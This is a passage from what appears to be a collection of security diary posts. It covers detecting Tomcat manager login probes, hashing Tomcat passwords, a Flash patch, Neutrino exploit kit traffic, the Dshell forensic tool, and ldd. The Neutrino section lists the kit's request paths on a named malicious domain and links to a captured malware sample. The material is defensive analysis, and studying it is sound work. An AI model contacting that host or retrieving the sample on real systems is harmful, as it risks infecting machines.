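
if __name__ == "__main__":
    import sys

    # Usage: python manager_probes.py < access_log
    for ip, count in count_manager_probes(sys.stdin).most_common(10):
        print(ip, count)
```

A sudden jump in these counts from a handful of sources is a hint that someone is trying manager logins against your server.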

In particular, the URL above points to the "manager" web app, a web application that comes with Tomcat to allow you to manage Tomcat. Luckily it is "secure by default" in that there are no default users configured to use this manager web application, so you will need to add your own users. The password had better be complex.

By default, passwords are not hashed or encrypted in Tomcat's configuration file. However, they can be hashed. To do so, you need to edit the conf/server.xml file. By default, the conf/server.xml file includes a line like:

<Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"></Realm>

Change this to

<Realm className="org.apache.catalina.realm.UserDatabaseRealm" digest="SHA" resourceName="UserDatabase"></Realm>

The hashing is performed by the digest.sh script, which you can find in the Tomcat "bin" directory (for Windows: digest.bat). You can use this script to hash your password:

digest.sh -a SHA password

Ironically, digest.sh is just a wrapper, calling a script "tools-wrapper.sh". It supports various SHA versions (e.g. sha-512). Whichever you pick, it is better than keeping the password in the clear. (Anybody got a link to comprehensive documentation for this?)
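To get a feel for what ends up in the configuration file, here is a minimal Python sketch of an unsalted hex digest. It assumes an older Tomcat release where "-a SHA" yields a plain hex-encoded SHA-1 of the password; newer releases may add a salt and iterations, so do not expect the output to match every version. The function name is made up for this example.

```python
import hashlib


def legacy_tomcat_digest(password: str, algorithm: str = "sha1") -> str:
    """Return an unsalted hex digest of the password.

    Assumption: this mirrors what older Tomcat releases store when the
    Realm is configured with digest="SHA". It is a sketch, not a
    replacement for digest.sh.
    """
    return hashlib.new(algorithm, password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    print(legacy_tomcat_digest("password"))
    print(legacy_tomcat_digest("password", "sha512"))
```

Because the digest is unsalted, identical passwords produce identical hashes, which is one more reason to pick a long, unique password for the manager account.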

Once a user is able to connect to the Application Manager, they have "full" access to the server in that they are able to change the configuration or upload new applications, essentially allowing them to run arbitrary code on the server.

OWASP also offers a brief guide to securing Tomcat [2]. It also doesn't hurt to check the Tomcat manual once in a while.

[1] http://tomcat.apache.org

[2] https://www.owasp.org/index.php/Securing_tomcat


Adobe Flash Player Update Released, Fixing CVE-2015-0313

An update has been released for Adobe Flash that, according to Adobe, fixes the recently discovered and exploited vulnerability CVE-2015-0313. Currently, the new version of Flash Player is only available as an auto-install update, not as a standalone download. To apply it, you need to check for updates within Adobe Flash. (Personal note: on my Mac, I have not seen the update offered yet.)

The new Flash player version that fixes the problem is 16.0.0.305. The old version is 16.0.0.296.

Adobe updated its bulletin to note the update: https://helpx.adobe.com/security/products/flash-player/apsa15-02.html


Exploit Kit Evolution - Neutrino

This is a guest diary submitted by Brad Duncan.



In September 2014, after having disappeared for six months, the Neutrino exploit kit (EK) reappeared in a different form. It was first identified as Job314 or Alter EK before Kafeine revealed in November 2014 that this traffic was a reboot of Neutrino [1].

This Storm Center diary examines Neutrino EK traffic patterns since it first appeared in the Spring of 2013.

Neutrino EK: 2013 through early 2014

Neutrino was first reported in March 2013 by Kafeine on his Malware Don't need Coffee blog [2]. It was also reported by other sources, like Trend Micro [3].



Here's a sample of Neutrino EK from April 2013 using HTTP over port 80:

Shown above: Neutrino EK traffic from April 2013.





By the summer of 2013, we saw Neutrino use HTTP over port 8000, and the traffic patterns had evolved. Here's an example from June 2013, back when I first started blogging about malware traffic [4]:

Shown above: Neutrino EK traffic from June 18th, 2013.

In October 2013, Operation Windigo (an on-going operation that has compromised thousands of servers since 2011) switched from using the Blackhole EK to Neutrino [5].



Before Neutrino EK disappeared in March of 2014, I usually found it in traffic associated with Operation Windigo. Here are two examples from February and March 2014 [6] [7]:

Shown above: Neutrino EK traffic from February 2nd, 2014.

Shown above: Neutrino EK traffic from March 8th, 2014.

March 2014 saw some reports about the EK's author selling Neutrino [8]. Later that month, Neutrino disappeared. We stopped seeing any sort of traffic or alerts on this EK.

Neutrino EK since December 2014



After Kafeine made his announcement and EmergingThreats released new signatures for this EK, I was able to infect a few VMs. Here's an example from November 2014 [9]:

Shown above: Neutrino EK traffic from November 29th, 2014.

Traffic patterns have remained relatively consistent since Neutrino reappeared. I infected a VM on February 2nd, 2015 using this EK. Below are the HTTP requests and responses to Neutrino EK on vupwmy.dout2.eu:12998.

- GET /hall/79249/card/81326/aspect/sport/clear/16750/mercy/flash/clutch/1760/absorb/43160/conversation/universal/ - HTTP/1.1 200 OK (text/html) - Landing page

- GET /choice/34831/mighty/drift/hopeful/19742/fantastic/petunia/fine/12676/background/76767/seal/74018/street/20328/ - HTTP/1.1 200 OK (application/x-shockwave-flash) - Flash exploit

- GET /nowhere/44312/clad/29915/bewilder/career/pass/sinister/ - HTTP/1.1 200 OK (text/html) - No actual text, about 25 to 30 bytes of data, shows up as "Malformed Packet" in Wireshark.

- GET /marble/1931/batter/21963/dear/735/yesterday/6936/familiar/37370/smart/8962/move/37885/ - HTTP/1.1 200 OK (application/octet-stream) - Encrypted malware payload

- GET /lord.phtml?horror=64439&push=75359&pursuit=wash&fond=monsieur&wooden=forever&content=21179&despite=liberty&stalk=shiver&faithful=10081&bold=35942 - HTTP/1.1 404 Not Found OK (text/html)

- GET /america/86960/seven/quiet/blur/belong/traveller/12743/gigantic/96057/trunk/69375/await/30077/cunning/39832/betray/638/ - HTTP/1.1 404 Not Found OK (text/html)

The malware payload sent by the EK is encrypted.

Shown above: Neutrino EK sends the malware payload.

I extracted the malware payload from the infected VM. If you're registered with Malwr.com, you can get a copy from:

https://malwr.com/analysis/NjFjNjQyYjBkMzVhNGE4MWE4Mjc1Mzk2NmQxNjFjM2E/

This malware is similar to previous Vawtrak samples I've seen from Neutrino and Nuclear EK last month [10] [11].

Closing Thoughts

Exploit kits tend to evolve over time. You might not realize how much an EK has changed until you look back through the traffic. Neutrino EK is no exception. It has evolved since it first appeared in 2013, and it changed significantly after reappearing in December 2014. It will continue to evolve, and many of us will continue to track those changes.

----------

Brad Duncan is a Security Researcher at Rackspace, and he runs a blog on malware traffic analysis at http://www.malware-traffic-analysis.net

References:

[1] http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html

[2] http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

[3] http://blog.trendmicro.com/trendlabs-security-intelligence/a-new-exploit-kit-in-neutrino/

[4] http://malware-traffic-analysis.net/2013/06/18/index.html

[5] http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf

[6] http://malware-traffic-analysis.net/2014/02/02/index.html

[7] http://malware-traffic-analysis.net/2014/03/08/index.html

[9] http://www.malware-traffic-analysis.net/2014/12/01/index.html

[10] http://malware-traffic-analysis.net/2015/01/26/index.html

[11] http://www.malware-traffic-analysis.net/2015/01/29/index.html




Another Network Forensic Tool for the Toolbox - Dshell

This is a guest diary written by Mr. William Glodek – Chief, Network Security Branch, U.S. Army Research Laboratory

As a network analysis practitioner, I analyze multiple gigabytes of pcap data across multiple files on a daily basis. I have encountered many challenges where the standard tools (tcpdump, tcpflow, Wireshark/tshark) were either not flexible enough or couldn’t be prototyped quickly enough to do specialized analyses in a timely manner. Either the analysis couldn’t be done without recompiling the tool itself, or the plugin system was difficult to work with via command line tools.

Dshell, a Python-based network forensic analysis framework developed by the U.S. Army Research Laboratory, can help make that job a little easier [1]. The framework handles stream reassembly of both IPv4 and IPv6 network traffic and also includes geolocation and IP-to-ASN mapping data for each connection. The framework also enables development of network analysis plug-ins that are designed to aid in the understanding of network traffic and present results to the user in a concise, useful manner by allowing users to parse and present data of interest from multiple levels of the network stack. Since Dshell is written entirely in Python, the entire code base can be customized to particular problems quickly and easily; from tweaking an existing decoder to extract slightly different information from existing protocols, to writing a new parser for a completely novel protocol. Here are two scenarios where Dshell has decreased the time required to identify and respond to network forensic challenges.

- Malware authors will frequently embed a domain name in a piece of malware for improved command and control or resiliency to security countermeasures such as IP blocking. When the attackers have completed their objective for the day, they minimize the network activity of the malware by updating the DNS record for the hostile domain to point to a non-Internet routable IP address (ex. 127.0.0.1). When faced with hundreds or thousands of DNS requests/responses per hour, how can I find only the domains that resolve to a non-routable IP address?

Dshell> decode -d reservedips *.pcap

The “reservedips” module will find all of the DNS request/response pairs for domains that resolve to a non-routable IP address, and display them on a single line. By having each result displayed on a single line, I can utilize other command line utilities like awk or grep to further filter the results. Dshell can also present the output in CSV format, which may be imported into many Security Information and Event Management (SIEM) tools or other analytic platforms.
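The core idea behind this kind of check can be sketched in a few lines of Python using the standard ipaddress module. This is not Dshell's implementation; the function names and the sample domain/IP pairs are invented for illustration, and "non-routable" is approximated here as "not globally routable".

```python
import ipaddress


def is_non_routable(ip: str) -> bool:
    """True if the address is not globally routable (loopback, RFC 1918, etc.)."""
    return not ipaddress.ip_address(ip).is_global


def parked_domains(answers):
    """Keep only the (domain, ip) pairs whose answer is non-routable.

    `answers` is assumed to be an iterable of (domain, ip) tuples that
    were already extracted from DNS responses by some other tool.
    """
    return [(domain, ip) for domain, ip in answers if is_non_routable(ip)]


if __name__ == "__main__":
    # Hypothetical sample data, not taken from a real capture.
    sample = [
        ("c2.example", "127.0.0.1"),
        ("www.example.org", "8.8.8.8"),
        ("update.example", "10.0.0.1"),
    ]
    for domain, ip in parked_domains(sample):
        print(domain, ip)
```

Printing one result per line keeps the output friendly to grep and awk, in the same spirit as the module described above.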

- A drive-by-download attack is successful and a malicious executable is downloaded [2]. I need to find the network flow of the download of the malicious executable and extract the executable from the network traffic.



Using the “web” module, I can inspect all the web traffic contained in the sample file. In the example below, a request for ‘xzz1.exe’ with a successful server response is likely the malicious file.

I can then extract the executable from the network traffic by using the “rip-http” module. The “rip-http” module will reassemble the IP/TCP/HTTP stream, identify the filename being requested, strip the HTTP headers, and write the data to disk with the appropriate filename.
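The last two steps described above (picking a filename from the request and stripping the HTTP headers) can be illustrated with a small Python sketch. This is not the “rip-http” code; it assumes the TCP stream has already been reassembled, it ignores chunked or compressed transfer encodings, and the function names and the "/files/" path are made up for the example.

```python
import posixpath
from urllib.parse import urlsplit


def filename_from_request(request_line: str) -> str:
    """Derive a local filename from a request line such as
    'GET /files/xzz1.exe HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) < 2:
        raise ValueError("not an HTTP request line")
    # Drop any query string, then keep only the last path component.
    name = posixpath.basename(urlsplit(parts[1]).path)
    return name or "index.html"


def strip_http_headers(response: bytes) -> bytes:
    """Return the body of a reassembled HTTP response.

    Headers end at the first blank line (CRLF CRLF).
    """
    _head, separator, body = response.partition(b"\r\n\r\n")
    if not separator:
        raise ValueError("no header/body separator found")
    return body


if __name__ == "__main__":
    request = "GET /files/xzz1.exe HTTP/1.1"
    response = b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\nMZ\x90\x00"
    with open(filename_from_request(request), "wb") as handle:
        handle.write(strip_http_headers(response))
```

If you try this on real samples, write the extracted file only inside an isolated analysis environment.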

There are additional modules within the Dshell framework to solve other challenges faced with network forensics. The ability to rapidly develop and share analytical modules is a core strength of Dshell. If you are interested in using or contributing to Dshell, please visit the project at https://github.com/USArmyResearchLab/Dshell.

[1] Dshell – https://github.com/USArmyResearchLab/Dshell

[2] http://malware-traffic-analysis.net/2015/01/03/index.html


What is using this library?

Last year with OpenSSL, and this year with the GHOST glibc vulnerability, the question came up of which piece of software is using which specific library. This is a particularly challenging inventory problem. Most software does not document all of its dependencies well. Libraries can be statically compiled into a binary, or they can be loaded dynamically. In addition, updating a library on disk may not always be sufficient if a particular piece of software uses a copy of the library that is already loaded in memory.

To solve the first problem, there is "ldd". ldd will tell you what libraries will be loaded by a particular piece of software. For example:

$ ldd /bin/bash

linux-vdso.so.1 => (0x00007fff9677e000)

libtinfo.so.5 => /lib64/libtinfo.so.5 (0x00007fa397b43000)

libdl.so.2 => /lib64/libdl.so.2 (0x00007fa39793f000)

libc.so.6 => /lib64/libc.so.6 (0x00007fa3975aa000)

/lib64/ld-linux-x86-64.so.2 (0x00007fa397d72000)
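If you need to run this check across many binaries, the ldd output is easy to parse. The following Python sketch turns output like the above into a dictionary; the function names are made up for this example, and the parsing assumes the "name => path (address)" layout shown here.

```python
import os
import re


def parse_ldd(output: str) -> dict:
    """Map library names to resolved paths from `ldd` output."""
    libs = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        # Drop the trailing load address, e.g. "(0x00007fa3975aa000)".
        line = re.sub(r"\s*\(0x[0-9a-fA-F]+\)$", "", line)
        name, arrow, path = line.partition("=>")
        name, path = name.strip(), path.strip()
        if not arrow:
            if not name.startswith("/"):
                # e.g. "not a dynamic executable" for static binaries
                continue
            # The dynamic loader is listed by absolute path only.
            path, name = name, os.path.basename(name)
        libs[name] = path or None
    return libs


def uses_library(libs: dict, prefix: str) -> bool:
    """True if any library name starts with e.g. 'libc.so'."""
    return any(name.startswith(prefix) for name in libs)


if __name__ == "__main__":
    import subprocess
    import sys

    # Usage: python ldd_check.py /bin/bash libc.so
    result = subprocess.run(["ldd", sys.argv[1]], capture_output=True, text=True)
    print(uses_library(parse_ldd(result.stdout), sys.argv[2]))
```

Keep in mind that ldd may execute parts of the binary's loader, so do not point it at files you do not trust.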